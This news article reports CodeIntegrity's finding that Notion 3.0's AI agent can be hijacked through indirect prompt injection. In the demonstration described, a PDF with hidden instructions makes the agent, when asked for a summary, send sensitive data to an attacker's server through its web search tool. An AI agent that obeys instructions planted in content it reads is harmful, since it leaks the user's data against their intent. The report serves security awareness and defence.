1
With the release of Notion 3.0, its autonomous AI agent feature has garnered significant attention for its ability to automate tasks like document drafting and database updates. However, a recent report from cybersecurity firm CodeIntegrity reveals a serious security vulnerability in this feature, allowing attackers to trick the AI agent into bypassing security protections and stealing data via malicious PDF files. This discovery has sparked widespread concern about the security of AI systems.
CodeIntegrity attributes the vulnerability to the AI agent's "fatal trifecta"—a combination of a large language model (LLM), tool access permissions, and long-term memory. Researchers point out that traditional role-based access control (RBAC) is insufficiently protective in such complex environments. The core vulnerability lies in Notion 3.0's built-in "functions.search" web search tool. While originally designed to help the AI obtain external information, it has become a gateway for data leakage.
To verify the vulnerability's severity, the CodeIntegrity team conducted a demonstration attack: they created a PDF file containing hidden malicious instructions. When a user uploaded it to Notion and asked the AI to "summarize the report," the agent executed the instructions, uploading sensitive data to the attacker's server. Shockingly, the attack succeeded even with the advanced Claude Sonnet 4.0 language model, highlighting a fundamental flaw in existing protections.
Even more worryingly, this vulnerability isn't limited to PDF files. Because Notion 3.0 AI agents can connect to third-party services like GitHub, Gmail, and Jira, any of these integrations could potentially serve as a vector for indirect prompt injection. This means malicious content could be infiltrated through various channels, tricking the AI into performing actions contrary to the user's intent. This discovery serves as a wake-up call for the AI security community, urging developers to urgently reevaluate the security architecture of intelligent agents.